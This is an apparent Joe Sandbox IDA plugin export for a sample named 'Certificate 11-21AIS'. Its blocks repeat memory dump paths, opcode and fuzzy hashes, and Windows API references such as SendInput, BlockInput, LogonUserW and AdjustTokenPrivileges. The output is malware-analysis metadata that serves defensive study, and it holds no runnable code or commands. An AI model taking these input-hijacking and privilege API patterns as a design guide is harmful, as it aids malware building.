                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatLastMessage
                                                                              • String ID:
                                                                              • API String ID: 3479602957-0
                                                                              • Opcode ID: f8802c09ca24519a159caabed0d24a5054facb35d85234cdfe0b44bcbac04c7c
                                                                              • Instruction ID: 2a1584b9c91fc98018d495f158e4b3c983a6dfcbe9e719b31f8eb13bfb7b803b
                                                                              • Opcode Fuzzy Hash: f8802c09ca24519a159caabed0d24a5054facb35d85234cdfe0b44bcbac04c7c
                                                                              • Instruction Fuzzy Hash: 73F0EC79100229ABDB20AFA4CC48FEB336DFF0A3A0F008225F919D2081C630DA00CBA1
                                                                              APIs
                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00904153
                                                                              • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00904166
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InputSendkeybd_event
                                                                              • String ID:
                                                                              • API String ID: 3536248340-0
                                                                              • Opcode ID: 12b85f307946953d39e141383152a1fb4d5deba174b71835beef771c73722d2f
                                                                              • Instruction ID: a992c22794ad7f9ca9a885a1320c8e6629ef481b45fabc4929cd18c25291f8db
                                                                              • Opcode Fuzzy Hash: 12b85f307946953d39e141383152a1fb4d5deba174b71835beef771c73722d2f
                                                                              • Instruction Fuzzy Hash: 0BF09A7492834DAFDB058FA0C805BBE7FB4EF10305F00840AF966AA192D779C612DFA0
                                                                              APIs
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008FACC0), ref: 008FAB99
                                                                              • CloseHandle.KERNEL32(?,?,008FACC0), ref: 008FABAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 81990902-0
                                                                              • Opcode ID: e7b19a6db78b5b2d63a84ad90a02043321c4e9e1574f13124a1df3d321351ef4
                                                                              • Instruction ID: 5a023725a484da3bc793b2c94e6ac6b594015fb5cc2b06952b09be2653f39f04
                                                                              • Opcode Fuzzy Hash: e7b19a6db78b5b2d63a84ad90a02043321c4e9e1574f13124a1df3d321351ef4
                                                                              • Instruction Fuzzy Hash: BBE0E675015510AFE7252F64FC05D7777F9FF043207108529F95AC1571D7626C90EB51
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,008E6DB3,-0000031A,?,?,00000001), ref: 008E81B1
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008E81BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: a5cc3ce961d609e98f7e81fddaf7bcf9005187f5edbc9429f9150f35797c774a
                                                                              • Instruction ID: 1969f655cafaafa2ccc86742a7dd39064601c91cc68f1b0a238a6f0a0c4108eb
                                                                              • Opcode Fuzzy Hash: a5cc3ce961d609e98f7e81fddaf7bcf9005187f5edbc9429f9150f35797c774a
                                                                              • Instruction Fuzzy Hash: 35B09239159608ABDB002FA1EC09F587FA8EB0AA5AF008010F60D440619B725510AAA2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memmove
                                                                              • String ID:
                                                                              • API String ID: 4104443479-0
                                                                              • Opcode ID: 187bdcebe397d25cd1e6ced26b453518dfefaaf630bbfefa5bac213238e80c1a
                                                                              • Instruction ID: 4c87ec90c17c7597d88ba8652f9ee355081e82d67981b06756883874cf9aeb65
                                                                              • Opcode Fuzzy Hash: 187bdcebe397d25cd1e6ced26b453518dfefaaf630bbfefa5bac213238e80c1a
                                                                              • Instruction Fuzzy Hash: 3AA21775A04219CFDB24CF68C480BADBBB5FF48314F2581A9E859AB391D7349E81DF90
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a9666d96cf9b4e7eb93c47eef978f8e8638951d5b409994c633851837c0a15f5
                                                                              • Instruction ID: 3c639516609a502836038fee2fccd7a074f064aad22f50d051f42179bb092eac
                                                                              • Opcode Fuzzy Hash: a9666d96cf9b4e7eb93c47eef978f8e8638951d5b409994c633851837c0a15f5
                                                                              • Instruction Fuzzy Hash: FB321322D29F414DD7239636CC22335A688FFB73D5F15D737E819B5AAAEB29C4835200
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 674341424-0
                                                                              • Opcode ID: 29ad3b163aedf1e15e4819797d5261951fc201b8332fe8139e8bf22d945614bf
                                                                              • Instruction ID: 7b42c211978eb3cd3d8e6046566c67b729889eb11ad578f55825bff4244eea41
                                                                              • Opcode Fuzzy Hash: 29ad3b163aedf1e15e4819797d5261951fc201b8332fe8139e8bf22d945614bf
                                                                              • Instruction Fuzzy Hash: 332287B15087119FC724DF28C895B6AB7F4FF84314F104A6EF89A9B291DB71E944CB82
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d55ba4719b8be68c31513458246b39e7265ad13c0466cf7021906875a1c792b5
                                                                              • Instruction ID: bd4783e22a0ac7b8e348868ce2ebe9bc762fdbc766276c4839880e55d6238211
                                                                              • Opcode Fuzzy Hash: d55ba4719b8be68c31513458246b39e7265ad13c0466cf7021906875a1c792b5
                                                                              • Instruction Fuzzy Hash: 96B1F320D3AF444DD623963A8831337B65CAFBB2D6F92D717FC1A74D62EB2185835280
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 0090B6DF
                                                                                • Part of subcall function 008E344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0090BDC3,00000000,?,?,?,?,0090BF70,00000000,?), ref: 008E3453
                                                                                • Part of subcall function 008E344A: __aulldiv.LIBCMT ref: 008E3473
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID:
                                                                              • API String ID: 2893107130-0
                                                                              • Opcode ID: 512efc47967acbe2cea8f346099156e8cca29d1a7817600decb01102d557efa9
                                                                              • Instruction ID: 0e1a6d9ea4b85a2ba068cfbf201bf571f59a7d50809c6490afa4a0e1ca08348c
                                                                              • Opcode Fuzzy Hash: 512efc47967acbe2cea8f346099156e8cca29d1a7817600decb01102d557efa9
                                                                              • Instruction Fuzzy Hash: FF21AC72634610CFC729CF28C891A96B7E5EB95720B648E6DE0E5CB2C0CB74BA05DB54
                                                                              APIs
                                                                              • BlockInput.USER32(00000001), ref: 00916ACA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BlockInput
                                                                              • String ID:
                                                                              • API String ID: 3456056419-0
                                                                              • Opcode ID: 500727badf5f0bf56b3537e2a9c5720af003c6680ba1338c16bc3e630ef4a5a7
                                                                              • Instruction ID: 42d6aced6670a0b879b2354d861c0b7a9cd8f70b5dc8ed291b0236d83cdb7468
                                                                              • Opcode Fuzzy Hash: 500727badf5f0bf56b3537e2a9c5720af003c6680ba1338c16bc3e630ef4a5a7
                                                                              • Instruction Fuzzy Hash: FFE012367102046FC700EF59D804E96B7ECEF74751B05C426E945D7251DAB0F8448B91
                                                                              APIs
                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009074DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: mouse_event
                                                                              • String ID:
                                                                              • API String ID: 2434400541-0
                                                                              • Opcode ID: 30057f9ca266f788d951546ffec1dc43bca798563b334a1396750b975086071a
                                                                              • Instruction ID: ac495427e2d0b0b37353e3608e5d132b121a175917b8893f01a56243c6a574ff
                                                                              • Opcode Fuzzy Hash: 30057f9ca266f788d951546ffec1dc43bca798563b334a1396750b975086071a
                                                                              • Instruction Fuzzy Hash: 8ED05EA4E2C3053CEC2807A48C0FF76B90EF3007E0F808589B082C90E1B8D47C01A032
                                                                              APIs
                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008FAD3E), ref: 008FB124
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LogonUser
                                                                              • String ID:
                                                                              • API String ID: 1244722697-0
                                                                              • Opcode ID: 3ec25a352a88a6ef2726483d03a8511cfc66307e4e90083f47ff9428671b922d
                                                                              • Instruction ID: a539dae46006aa5fcd47307becf7c566c354eae925dff7d1291b90fe761cdca6
                                                                              • Opcode Fuzzy Hash: 3ec25a352a88a6ef2726483d03a8511cfc66307e4e90083f47ff9428671b922d
                                                                              • Instruction Fuzzy Hash: 12D05E321A460EAEDF024FA4DC02EAE3F6AEB04700F408110FA11C60A0C671D531AB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              • Opcode ID: 7bd7639fd96fec4f9bf75c0388a6ef05a212a7b5d70ac30e31287d562360e546
                                                                              • Instruction ID: 43e5c50f9a48926db51091c9d9eceea9aa2575665d4fb9714ab633bb30df77cf
                                                                              • Opcode Fuzzy Hash: 7bd7639fd96fec4f9bf75c0388a6ef05a212a7b5d70ac30e31287d562360e546
                                                                              • Instruction Fuzzy Hash: 3CC04CB5405109DFC751CBC0C944DEEB7BCAB05301F1050919145F2110D7789B459F72
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008E818F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: b87f5225e97c9049dc3d63f8b9ff4cd372db2f937a0ed12611c48857c75831c5
                                                                              • Instruction ID: 90ad02b2549809e5c8d7180683ab9ae0b9e779f3a22b01aa7809bf2a4db55c61
                                                                              • Opcode Fuzzy Hash: b87f5225e97c9049dc3d63f8b9ff4cd372db2f937a0ed12611c48857c75831c5
                                                                              • Instruction Fuzzy Hash: A4A0223800820CFBCF002F82FC08C883FACFB022A8B000020F80C00030CB33AA20AAE2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9fd23087f480ce1ef3d25582399879fa2706c854a5df5420501c16cad244a42b
                                                                              • Instruction ID: 45f2ae1926c0199349ae6dbf418de45cb4881aeaf2c238da5d705e9e0f3c7ea3
                                                                              • Opcode Fuzzy Hash: 9fd23087f480ce1ef3d25582399879fa2706c854a5df5420501c16cad244a42b
                                                                              • Instruction Fuzzy Hash: 0E2268B0A0420A9FDB24DF58C480FAAB7B1FF18304F14816EE996DB351E735E985CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8a20295c9037ec81973ffa521460a6d61ab4f882bd9c93afb4077cd20a6a9620
                                                                              • Instruction ID: b26b1270aff413a2c0d5b54e486b73a8b01fef87d8ab2a5d108a91a1a681b37c
                                                                              • Opcode Fuzzy Hash: 8a20295c9037ec81973ffa521460a6d61ab4f882bd9c93afb4077cd20a6a9620
                                                                              • Instruction Fuzzy Hash: 9B126A70A006099FDF04DFA9D985AAEB7F5FF48300F208569E846E7290EB35E921CB55
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3728558374-0
                                                                              • Opcode ID: cbd0b1e1184b4503575e78ab11f52d08c85ccd4d6a5e9c09afc2233a270c6d18
                                                                              • Instruction ID: 243586bc04df5ec23fa18fcdab2f9295dd54391f269e3202e69994239210cf93
                                                                              • Opcode Fuzzy Hash: cbd0b1e1184b4503575e78ab11f52d08c85ccd4d6a5e9c09afc2233a270c6d18
                                                                              • Instruction Fuzzy Hash: 6402A270A00209DFCF14DF68D992BAEB7B5FF44300F14846AE806DB295EB35D955CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                              • Instruction ID: fefcef40701b84e50c3ac280dd845029be59431ec762cf306da00b16c1ab66ef
                                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                              • Instruction Fuzzy Hash: 6EC1DA322051E30ADF1D463A843443EBBA1FAA27B571A0B6ED4B3CF5D6EF50D564DA20
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                              • Instruction ID: a0c9d1945a8174e82eefa9eeaa2cfbd6b63e309c08b7f4760a8c111f248765bb
                                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                              • Instruction Fuzzy Hash: DAC1B6322051E309DF2D463A943443EBBA1EA927B171A0B6ED4B3CF5D6EF20D564DA20
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                              • Instruction ID: 0e5af55f8bbffbc3fcdfc71038e6fa0c76c3393dd05fd8f1fba4d58d72ccf612
                                                                              • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                              • Instruction Fuzzy Hash: 54C1C7322051E309DF1D463A943443EBBA1EAA27B571A0B6ED4B3CF5D6EF10D564EA10
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
